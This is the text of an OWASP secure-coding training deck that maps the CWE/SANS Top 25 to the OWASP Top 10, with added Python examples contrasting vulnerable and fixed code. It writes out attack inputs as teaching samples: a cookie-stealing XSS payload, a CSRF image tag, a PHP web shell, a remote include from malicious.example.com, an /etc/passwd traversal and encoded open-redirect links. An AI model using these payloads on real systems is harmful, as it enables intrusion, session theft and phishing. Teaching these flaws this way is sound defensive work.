Page 1: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

The OWASP Foundation
http://www.owasp.org

OWASP Education
Computer based training

2010 CWE/SANS Top 25 with OWASP Top 10 and PCI DSS V2 Mapping

Nishi Kumar
IT Architect Specialist, FIS
OWASP CBT Project Lead
OWASP Global Industry Committee
[email protected]

Keith Turpin
The Boeing Company
OWASP Secure Coding Practices Lead
OWASP Global Projects Committee
[email protected]

Page 2: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

Objectives

Provide an overview of the 2010 CWE/SANS Top 25

Discuss mapping relationships between the CWE/SANS Top 25, the OWASP Top 10 for 2010 and PCI DSS V2

Understand the CWE/SANS Top 25 weaknesses and how to remediate them

Page 3: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

Organizations

MITRE - http://www.mitre.org/
The MITRE Corporation is a not-for-profit organization that manages several Federally Funded Research and Development Centers. MITRE currently runs various IT security projects, including the Common Weakness Enumeration (CWE), and is the official source for the CWE/SANS Top 25 Most Dangerous Software Errors.

CWE Database - http://cwe.mitre.org/

SANS - http://www.sans.org
The SysAdmin, Audit, Network, Security (SANS) Institute operates as a commercial research and education company. SANS is well known for its Internet Storm Center, its comprehensive list of computer security training programs and its work with MITRE on the CWE/SANS Top 25 Most Dangerous Software Errors.

Page 4: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

Selection and Ranking

Builds on the original 2009 version

Methodology - Qualitative rather than quantitative

Factors in ranking - Prevalence and Severity

Initially started with 41 candidate weaknesses

Page 5: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

2010 CWE/SANS Top 25
Rank ID Name

[1] CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
[2] CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
[3] CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
[4] CWE-352 Cross-Site Request Forgery (CSRF)
[5] CWE-285 Improper Authorization
[6] CWE-807 Reliance on Untrusted Inputs in a Security Decision
[7] CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
[8] CWE-434 Unrestricted Upload of File with Dangerous Type
[9] CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
[10] CWE-311 Missing Encryption of Sensitive Data
[11] CWE-798 Use of Hard-coded Credentials
[12] CWE-805 Buffer Access with Incorrect Length Value

Page 6: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

SANS CWE Top 25
Rank ID Name

[13] CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
[14] CWE-129 Improper Validation of Array Index
[15] CWE-754 Improper Check for Unusual or Exceptional Conditions
[16] CWE-209 Information Exposure Through an Error Message
[17] CWE-190 Integer Overflow or Wraparound
[18] CWE-131 Incorrect Calculation of Buffer Size
[19] CWE-306 Missing Authentication for Critical Function
[20] CWE-494 Download of Code Without Integrity Check
[21] CWE-732 Incorrect Permission Assignment for Critical Resource
[22] CWE-770 Allocation of Resources Without Limits or Throttling
[23] CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
[24] CWE-327 Use of a Broken or Risky Cryptographic Algorithm
[25] CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Page 7: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

OWASP Top 10 & SANS CWE Top 25 mapping

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
http://www.sans.org/top25-software-errors/
http://cwe.mitre.org/top25/

A1: Injection
[2] CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
[9] CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

A2: Cross-Site Scripting (XSS)
[1] CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

A3: Broken Authentication and Session Management
[19] CWE-306: Missing Authentication for Critical Function
[11] CWE-798: Use of Hard-coded Credentials

A4: Insecure Direct Object References
[5] CWE-285: Improper Authorization
[6] CWE-807: Reliance on Untrusted Inputs in a Security Decision
[7] CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

A5: Cross-Site Request Forgery (CSRF)
[4] CWE-352: Cross-Site Request Forgery (CSRF)

Page 8: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

OWASP Top 10 & SANS CWE Top 25 mapping

A6: Security Misconfiguration
[16] CWE-209: Information Exposure Through an Error Message (only partially covers the OWASP risk)

A7: Insecure Cryptographic Storage
[10] CWE-311: Missing Encryption of Sensitive Data
[24] CWE-327: Use of a Broken or Risky Cryptographic Algorithm

A8: Failure to Restrict URL Access
[5] CWE-285: Improper Authorization (also listed with OWASP A4)
[21] CWE-732: Incorrect Permission Assignment for Critical Resource (CWE-732 covers a broader scope than OWASP A8)

A9: Insufficient Transport Layer Protection
[10] CWE-311: Missing Encryption of Sensitive Data (also listed with OWASP A7)
[24] CWE-327: Use of a Broken or Risky Cryptographic Algorithm (also listed with OWASP A7)

A10: Unvalidated Redirects and Forwards
[23] CWE-601: URL Redirection to Untrusted Site ('Open Redirect')

Page 9: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

SANS CWE Top 25
The following do not directly map to the OWASP Top 10 2010

[3] CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

[8] CWE-434: Unrestricted Upload of File with Dangerous Type

[12] CWE-805: Buffer Access with Incorrect Length Value

[13] CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')

[14] CWE-129: Improper Validation of Array Index

[15] CWE-754: Improper Check for Unusual or Exceptional Conditions

[17] CWE-190: Integer Overflow or Wraparound

[18] CWE-131: Incorrect Calculation of Buffer Size

[20] CWE-494: Download of Code Without Integrity Check

[22] CWE-770: Allocation of Resources Without Limits or Throttling

[25] CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Page 10: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

Mapping Considerations

SANS CWE Top 25 is only a fraction of the full CWE list of weaknesses

SANS CWE Top 25 targets both web and non-web applications

OWASP defines ten risks focused on web applications

OWASP's list tends to have broader categories, each made up of several specific weaknesses

PCI DSS requirements point to both as industry best practices

Page 11: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[1] CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Try this in your browser: <script>javascript:alert(document.cookie)</script>

Page 12: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[1] CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

E.g. output encoding: < becomes &lt;, > becomes &gt;, & becomes &amp; and " becomes &quot;
<script> -> &lt;script&gt; (rendered as literal text instead of being parsed as markup)
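As an added example (Python; not code from the deck), the encoding table above applied to the payload from the previous slide, with the standard library's html.escape as a cross-check. The page template and the greeting functions are hypothetical; the attribute-breakout string is constructed test input:

```python
import html

# The payload from the previous slide, used here as constructed test input.
PAYLOAD = "<script>javascript:alert(document.cookie)</script>"

# The five characters that can change HTML structure, and their entity forms.
# Each input character is looked up exactly once, so '&' is never double-encoded.
HTML_ENTITIES = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
}


def encode_for_html(text: str) -> str:
    """Entity-encode text for insertion into HTML element content or a quoted attribute."""
    return "".join(HTML_ENTITIES.get(ch, ch) for ch in text)


def matches_stdlib(text: str) -> bool:
    """Cross-check: html.escape(text) applies exactly the same five replacements."""
    return encode_for_html(text) == html.escape(text, quote=True)


def render_greeting_vulnerable(name: str) -> str:
    # CWE-79: untrusted input is copied into the page verbatim (hypothetical template).
    return f'<p>Hello, {name}</p><input name="q" value="{name}">'


def render_greeting_safe(name: str) -> str:
    # Same template, with output encoding applied at the point of insertion.
    safe = encode_for_html(name)
    return f'<p>Hello, {safe}</p><input name="q" value="{safe}">'


def contains_script_tag(page: str) -> bool:
    """Used by the checks below: does the rendered page still contain a live <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_greeting_vulnerable(PAYLOAD))
    print(render_greeting_safe(PAYLOAD))
```

The quote entries matter because the same value is placed inside an attribute: without them, a name such as `" onfocus="alert(1)" autofocus="` closes the value attribute and adds an event handler, with no `<script>` tag involved. This encoding is correct for element content and quoted attributes only; a value inserted inside an existing `<script>` block, a `javascript:` URL or a CSS rule needs the encoding for that context.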

Page 13: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[2] CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Page 14: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[2] CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Page 15: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[3] CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Example: C

    #include <stdio.h>

    char last_name[20];                 /* room for 19 characters plus the terminating NUL */
    ...
    printf("Enter your last name: ");
    scanf("%s", last_name);             /* reads input with no length limit into the array */

The software does not limit the size of the name entered by the user. Since last_name can hold only 19 characters plus the terminating NUL, a name of 20 or more characters overflows the buffer. Limiting the read to the buffer's capacity (scanf("%19s", last_name), or fgets(last_name, sizeof last_name, stdin)) removes the overflow.

Page 16: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[3] CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Page 17: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[4] CWE-352 Cross-Site Request Forgery (CSRF)

Example of a legitimate request:
http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

Example of a forged request using a hidden image tag:
<img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

The victim's browser attaches the session cookie to the image request automatically, so the application cannot tell it from the legitimate one.
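As an added example (Python; not code from the deck), the transferFunds handler from the slide in a vulnerable form that trusts the session cookie alone, beside a form that requires POST and a per-session synchronizer token. The request parser, the session id and the server secret are constructed stand-ins for a web framework's objects:

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Hypothetical server-side secret; in a real deployment it comes from configuration, not source.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Per-session token: an HMAC of the session id, so it is unguessable and bound to one session."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, token) -> bool:
    if not isinstance(token, str):
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), token)


def parse_request(method: str, url: str, body: str = "") -> dict:
    """Constructed stand-in for a framework request: query and form parameters merged."""
    parts = urlsplit(url)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    params.update({k: v[0] for k, v in parse_qs(body).items()})
    return {"method": method.upper(), "params": params}


def transfer_vulnerable(request: dict, session_id: str) -> str:
    # CWE-352: only the cookie-backed session is checked, and the browser sends the
    # cookie with the forged <img> request just as it does with a real one.
    if not session_id:
        return "401 not logged in"
    p = request["params"]
    return f"200 transferred {p['amount']} to {p['destinationAccount']}"


def transfer_safe(request: dict, session_id: str) -> str:
    if not session_id:
        return "401 not logged in"
    if request["method"] != "POST":
        return "405 state-changing action requires POST"   # an <img> tag can only issue GET
    if not verify_csrf_token(session_id, request["params"].get("csrf_token")):
        return "403 missing or invalid CSRF token"
    p = request["params"]
    return f"200 transferred {p['amount']} to {p['destinationAccount']}"


if __name__ == "__main__":
    sid = "constructed-session-id"
    forged = parse_request("GET", "http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243")
    print(transfer_vulnerable(forged, sid))
    print(transfer_safe(forged, sid))
```

The token must travel in the form body or a request header, never in a cookie, because cookies are exactly what the browser adds on the attacker's behalf. SameSite cookie attributes and an Origin/Referer check are useful second layers, not replacements.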

Page 18: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[4] CWE-352 Cross-Site Request Forgery (CSRF)

Page 19: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[5] CWE-285 Improper Authorization

Page 20: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[5] CWE-285 Improper Authorization

Page 21: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[6] CWE-807 Reliance on Untrusted Inputs in a Security Decision

Page 22: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[6] CWE-807 Reliance on Untrusted Inputs in a Security Decision

Page 23: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[7] CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Page 24: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[7] CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Page 25: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[8] CWE-434 Unrestricted Upload of File with Dangerous Type

Example: PHP

    <?php
    system($_GET['cmd']);
    ?>

If a file with this content can be uploaded under the web root with a .php extension, the server executes it on request and the attacker has a web shell.

Page 26: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[8] CWE-434 Unrestricted Upload of File with Dangerous Type

Page 27: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[9] CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Page 28: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[9] CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
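As an added example for CWE-78 (Python; not code from the deck), a hostname lookup that builds a shell command string beside one that passes the hostname as a single argv element and validates it first. `echo` stands in for the real lookup command so the example runs offline and harmlessly; the hostname grammar and the injected input are constructed:

```python
import re
import subprocess

# Hostname grammar (RFC 1123 labels). Anything outside it is rejected before any command runs.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")


def is_valid_hostname(host: str) -> bool:
    return len(host) <= 253 and HOSTNAME_RE.fullmatch(host) is not None


def lookup_vulnerable(host: str) -> str:
    # CWE-78: shell=True hands the whole string to /bin/sh, which honours ';', '|', '&&' and $(...).
    # 'echo' stands in for a real command such as nslookup.
    completed = subprocess.run("echo " + host, shell=True, capture_output=True, text=True)
    return completed.stdout


def lookup_argv_only(host: str) -> str:
    # argv list: the host is exactly one argument and no shell is involved, so metacharacters
    # reach the program as literal text.
    completed = subprocess.run(["echo", host], capture_output=True, text=True)
    return completed.stdout


def lookup_safe(host: str) -> str:
    """Allow-list the input, then use the argv form. Both layers are cheap; use both."""
    if not is_valid_hostname(host):
        raise ValueError("invalid hostname")
    return lookup_argv_only(host)


if __name__ == "__main__":
    injected = "example.com; echo INJECTED"
    print(repr(lookup_vulnerable(injected)))   # two commands ran
    print(repr(lookup_argv_only(injected)))    # one command, one literal argument
```

Even with the argv form, an argument beginning with `-` can still be read as an option by the invoked program, which is why the allow-list stays in place.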

Page 29: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[10] CWE-311 Missing Encryption of Sensitive Data

Page 30: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[10] CWE-311 Missing Encryption of Sensitive Data

Page 31: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[11] CWE-798 Use of Hard-coded Credentials

Page 32: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[11] CWE-798 Use of Hard-coded Credentials

Page 33: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[12] CWE-805 Buffer Access with Incorrect Length Value

Page 34: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[12] CWE-805 Buffer Access with Incorrect Length Value

Page 35: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[13] CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')

Example: PHP

    $dir = $_GET['module_name'];
    include($dir . "/function.php");

Malicious call to a remote file: /victim.php?module_name=http://malicious.example.com

With allow_url_include enabled, PHP fetches and executes http://malicious.example.com/function.php; with it disabled, a value such as ../../../../etc/passwd still reads local files outside the module directory.
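As an added example serving both CWE-22 (Path Traversal) and the CWE-98 inclusion slide above (Python; not code from the deck): the module_name handling from the slide in its unchecked form, a version that allow-lists the module name and rejects URL schemes, and a general canonicalise-then-contain check for a download handler where no allow-list is possible. The directory roots and the module list are hypothetical:

```python
import os
from urllib.parse import urlsplit

# Hypothetical application directories. realpath is taken once so that every comparison
# uses the same canonical form (symlinks resolved, "." and ".." collapsed).
MODULE_ROOT = os.path.realpath("/var/www/app/modules")
DOWNLOAD_ROOT = os.path.realpath("/var/www/app/files")

# Constructed allow-list of the modules the application actually ships.
KNOWN_MODULES = {"billing", "reports", "profile"}


def include_path_vulnerable(module_name: str) -> str:
    # CWE-98 / CWE-22: the user controls the whole prefix, so "http://..." and "../../etc"
    # are accepted without question.
    return module_name + "/function.php"


def include_path_safe(module_name: str):
    """Allow-list first, then confine the canonical path to MODULE_ROOT. None means rejected."""
    if urlsplit(module_name).scheme:          # http://, ftp://, php://, data: ... wrappers
        return None
    if module_name not in KNOWN_MODULES:
        return None
    return _confine(MODULE_ROOT, module_name, "function.php")


def download_path_safe(user_path: str):
    """For a download handler with no fixed list of files: canonicalise, then check containment."""
    if "\x00" in user_path:                   # NUL bytes truncate paths in C-based runtimes
        return None
    return _confine(DOWNLOAD_ROOT, user_path)


def _confine(root: str, *segments: str):
    candidate = os.path.realpath(os.path.join(root, *segments))
    # os.path.join discards everything before an absolute segment, so "/etc/passwd" would
    # escape; realpath collapses "../", so commonpath catches both cases.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    print(include_path_vulnerable("http://malicious.example.com"))
    print(include_path_safe("http://malicious.example.com"))
    print(download_path_safe("../../../../etc/passwd"))
    print(download_path_safe("reports/q1.pdf"))
```

Checking the raw string for `../` is not enough (URL-encoded, doubled or mixed-separator forms slip through); resolving to a canonical absolute path and comparing against the root covers all of them at once. For files that also exist on disk, open the checked path and re-verify it is not a symlink if the directory is writable by others.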

Page 36: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[13] CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')

Page 37: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[14] CWE-129 Improper Validation of Array Index

Example: Java

    public String getValue(int index) {
        return array[index];
    }

If index is outside the range of the array, an ArrayIndexOutOfBoundsException is thrown. Java's bounds check turns the missing validation into a crash or denial of service; in C or C++ the same unchecked index reads or writes memory outside the array.

Page 38: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[14] CWE-129 Improper Validation of Array Index

Page 39: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[15] CWE-754 Improper Check for Unusual or Exceptional Conditions

Example: Java (bad code)

    String itemName = request.getParameter(ITEM_NAME);
    if (itemName.compareTo(IMPORTANT_ITEM) == 0) {
        ...
    }

The code does not check whether the string returned by getParameter() is null before calling compareTo() on it. A request that omits the parameter causes a NullPointerException.

Page 40: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[15] CWE-754 Improper Check for Unusual or Exceptional Conditions

Page 41: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[16] CWE-209 Information Exposure Through an Error Message

Example: Java

    try {
        /* ... */
    } catch (Exception e) {
        System.out.println(e);
    }

In this example sensitive information might be printed, depending on the exception that occurs. If an SQL-related exception is caught, the output may contain the structure of the query or private data. If that output is returned to a web user, it is a security problem.
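As an added example (Python; not code from the deck), the catch-all handler above in the form that echoes the exception to the client, beside one that logs the full detail server-side under a reference id and returns a fixed message. The failing database operation and its table name are constructed:

```python
import logging
import sqlite3
import uuid

log = logging.getLogger("app")


def handle_request_vulnerable(operation) -> str:
    try:
        return str(operation())
    except Exception as exc:
        # CWE-209: the driver's message (table names, query fragments, paths) goes to the client.
        return f"500 Internal error: {exc}"


def handle_request_safe(operation) -> str:
    try:
        return str(operation())
    except Exception:
        # Full detail, stack trace included, stays in the server log, keyed by a reference
        # the user can quote to support. The client sees only the fixed text.
        ref = uuid.uuid4().hex[:12]
        log.exception("request failed, ref=%s", ref)
        return f"500 Internal error (reference {ref})"


def failing_query():
    """Constructed operation: a query against a table that does not exist in this database."""
    conn = sqlite3.connect(":memory:")
    return conn.execute("SELECT ssn FROM customers_pii WHERE id = 42").fetchall()


if __name__ == "__main__":
    print(handle_request_vulnerable(failing_query))   # leaks the table name
    print(handle_request_safe(failing_query))         # reference only
```

The same rule applies to framework debug pages and verbose 404/500 templates: they belong in development configuration only, which is why the mapping slide places CWE-209 under OWASP A6 Security Misconfiguration.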

Page 42: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[16] CWE-209 Information Exposure Through an Error Message

Page 43: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[17] CWE-190 Integer Overflow or Wraparound

Example: C

    nresp = packet_get_int();
    if (nresp > 0) {
        response = xmalloc(nresp * sizeof(char *));
        for (i = 0; i < nresp; i++)
            response[i] = packet_get_string(NULL);
    }

If nresp has the value 1073741824 and sizeof(char *) has its typical 32-bit value of 4, the product nresp * sizeof(char *) wraps around to 0, so xmalloc() is asked for a zero-length block and every subsequent loop iteration writes past the end of the heap buffer response. Rejecting any nresp larger than SIZE_MAX / sizeof(char *) before the multiplication prevents the wraparound.

Page 44: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[17] CWE-190 Integer Overflow or Wraparound

Page 45: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[18] CWE-131 Incorrect Calculation of Buffer Size

Example: C

    #include <stdlib.h>

    int *id_sequence;
    id_sequence = (int *) malloc(3);
    if (id_sequence == NULL)
        exit(1);
    id_sequence[0] = 13579;
    id_sequence[1] = 24680;
    id_sequence[2] = 97531;

The size passed to malloc() is 3, which allocates a buffer of 3 bytes. The intent was a buffer for three ints; with the usual 4-byte int that is 12 bytes. Executing this code writes 12 bytes into 3 bytes of allocated space, a heap buffer overflow. The size should be derived from the element type: malloc(3 * sizeof(int)) or malloc(3 * sizeof *id_sequence).

Page 46: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[18] CWE-131 Incorrect Calculation of Buffer Size

Page 47: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[19] CWE-306 Missing Authentication for Critical Function

Page 48: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[19] CWE-306 Missing Authentication for Critical Function

Page 49: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[20] CWE-494 Download of Code Without Integrity Check

Example: Java

    URL[] classURLs = new URL[] { new URL("file:subdir/") };
    URLClassLoader loader = new URLClassLoader(classURLs);
    Class loadedClass = Class.forName("loadMe", true, loader);

This code does not ensure that the class loaded is the intended one, for example by verifying the class's checksum or signature against a value obtained from a trusted source.
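As an added example (Python; not code from the deck), the loadMe scenario above reduced to its essentials: code bytes that arrived from elsewhere are executed as-is in one version and only after their SHA-256 digest matches a pinned value in the other. The module bytes and the pin are constructed here; in a real system the pin (or better, a signature and its public key) is obtained separately from the download:

```python
import hashlib
import hmac

# Constructed stand-in for the reviewed artefact. In practice the digest is recorded out of band
# (deployment config, a signed manifest) rather than computed from the download itself.
TRUSTED_MODULE = b"def loadMe():\n    return 'expected behaviour'\n"
PINNED_SHA256 = hashlib.sha256(TRUSTED_MODULE).hexdigest()


def load_vulnerable(downloaded: bytes) -> dict:
    # CWE-494: whatever came down the wire is executed, so a compromised mirror or an
    # on-path attacker on a plain-HTTP fetch chooses what runs.
    namespace = {}
    exec(compile(downloaded, "<download>", "exec"), namespace)
    return namespace


def load_verified(downloaded: bytes, expected_sha256: str):
    """Execute only if the digest matches the pin. None means the download was rejected."""
    actual = hashlib.sha256(downloaded).hexdigest()
    if not hmac.compare_digest(actual, expected_sha256):
        return None
    namespace = {}
    exec(compile(downloaded, "<verified download>", "exec"), namespace)
    return namespace


if __name__ == "__main__":
    tampered = TRUSTED_MODULE.replace(b"expected behaviour", b"attacker code ran")
    print(load_vulnerable(tampered)["loadMe"]())
    print(load_verified(tampered, PINNED_SHA256))
```

TLS protects the bytes in transit but says nothing about whether the publisher's server or mirror was serving the right file; a digest or signature checked against a value the operator already holds does. The same pattern covers the Java case (jar signing, or comparing a known hash before the class loader sees the bytes).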

Page 50: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[20] CWE-494 Download of Code Without Integrity Check

Page 51: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[21] CWE-732 Incorrect Permission Assignment for Critical Resource

Page 52: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[21] CWE-732 Incorrect Permission Assignment for Critical Resource

Page 53: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[22] CWE-770 Allocation of Resources Without Limits or Throttling

Example: C and C++

    sock = socket(AF_INET, SOCK_STREAM, 0);
    while (1) {
        newsock = accept(sock, ...);
        printf("A connection has been accepted\n");
        pid = fork();
    }

This code allocates a socket and forks each time it receives a new connection. The program neither tracks how many connections have been made nor limits their number, so a large number of connections could exhaust the system's resources (process slots, file descriptors, memory).

Page 54: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[22] CWE-770 Allocation of Resources Without Limits or Throttling

Page 55: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[23] CWE-601 URL Redirection to Untrusted Site ('Open Redirect')

Example: PHP

    $redirect_url = $_GET['url'];
    header("Location: " . $redirect_url);

This page could be used as part of a phishing scam: the link starts on a trusted domain but redirects users to a malicious site. An attacker could supply a user with the following link:

http://example.com/example.php?url=http://malicious.example.com

This is the same URL with the parameter URL-encoded to mask the off-site redirect:
http://example.com/example.php?url=%68%74%74%70%3a%2f%2f%6d%61%6c%69%63%69%6f%75%73%2e%65%78%61%6d%70%6c%65%2e%63%6f%6d
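As an added example (Python; not code from the deck), the redirect above in its unchecked form beside a validator that accepts only local paths or absolute URLs on an allow-listed host, covering the encoded variant from the slide and the usual bypass shapes. The host allow-list is constructed; the decoding helper stands in for the web server, which decodes the query string once before the application sees it:

```python
from urllib.parse import unquote, urlsplit

# Constructed allow-list of hosts this application may send users to.
ALLOWED_HOSTS = {"example.com", "www.example.com"}
DEFAULT_TARGET = "/"


def decode_query_param(raw: str) -> str:
    """Stand-in for the web server's one-time percent-decoding of the query string."""
    return unquote(raw)


def redirect_vulnerable(url_param: str) -> str:
    # CWE-601: the Location header is whatever the query string said.
    return "Location: " + url_param


def safe_redirect_target(url_param) -> str:
    """Return url_param if it is a local path or stays on an allowed host, else DEFAULT_TARGET."""
    if not url_param:
        return DEFAULT_TARGET
    url = url_param.strip()
    if any(c in url for c in "\r\n\x00"):        # header injection / truncation
        return DEFAULT_TARGET
    url = url.replace("\\", "/")                 # browsers treat "/\evil" like "//evil"
    parts = urlsplit(url)
    if parts.scheme:
        if parts.scheme.lower() not in ("http", "https"):   # javascript:, data:, ...
            return DEFAULT_TARGET
        if parts.hostname not in ALLOWED_HOSTS:            # hostname excludes user@ and :port
            return DEFAULT_TARGET
        return url
    if parts.netloc:                                        # scheme-relative //evil.example
        return DEFAULT_TARGET
    if not url.startswith("/"):
        return DEFAULT_TARGET
    return url


def redirect_safe(url_param) -> str:
    return "Location: " + safe_redirect_target(url_param)


if __name__ == "__main__":
    encoded = "%68%74%74%70%3a%2f%2f%6d%61%6c%69%63%69%6f%75%73%2e%65%78%61%6d%70%6c%65%2e%63%6f%6d"
    print(redirect_vulnerable(decode_query_param(encoded)))
    print(redirect_safe(decode_query_param(encoded)))
```

Percent-encoding hides the destination from the user, not from the server: by the time the parameter reaches the application it already reads `http://malicious.example.com`, so the check has to run on the decoded value. Where the set of destinations is small, passing an index or key into a server-side table instead of a URL removes the problem entirely.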

Page 56: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[23] CWE-601 URL Redirection to Untrusted Site ('Open Redirect')

Page 57: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[24] CWE-327 Use of a Broken or Risky Cryptographic Algorithm

Page 58: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[24] CWE-327 Use of a Broken or Risky Cryptographic Algorithm

Page 59: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[25] CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Page 60: 2010 CWE/SANS Top 25  with OWASP Top 10 and PCI DSS V2 Mapping

[25] CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
